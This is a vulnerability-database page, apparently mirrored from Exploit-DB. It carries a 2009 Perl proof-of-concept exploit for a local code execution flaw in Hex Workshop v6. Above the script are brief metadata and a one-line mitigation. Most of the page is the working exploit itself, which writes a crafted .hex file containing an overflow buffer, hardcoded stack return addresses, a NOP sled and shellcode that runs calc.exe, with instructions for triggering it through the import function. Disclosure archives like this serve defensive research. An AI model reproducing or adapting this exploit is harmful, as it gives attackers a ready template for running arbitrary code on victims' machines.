Hex Workshop - exploit.company

vendor:

Hex Workshop

by:

Security^Ghost and DATA_SNIPER

9.3

CVSS

HIGH

Local Code Execution

78 (Improper Neutralization of Special Elements used in an OS Command)

CWE

Product Name: Hex Workshop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 FR

2009

Hex Workshop <= v6 (.hex) File Local Code Execution

Hex Workshop is vulnerable to a local code execution vulnerability. An attacker can exploit this vulnerability by creating a specially crafted .hex file and importing it into Hex Workshop. This will cause the application to execute arbitrary code on the system.

Mitigation:

Users should avoid opening untrusted .hex files in Hex Workshop.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovred by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information vist my blog:http://datasniper.arab4services.net/
# the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.

print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";

# milw0rm.com [2009-02-27]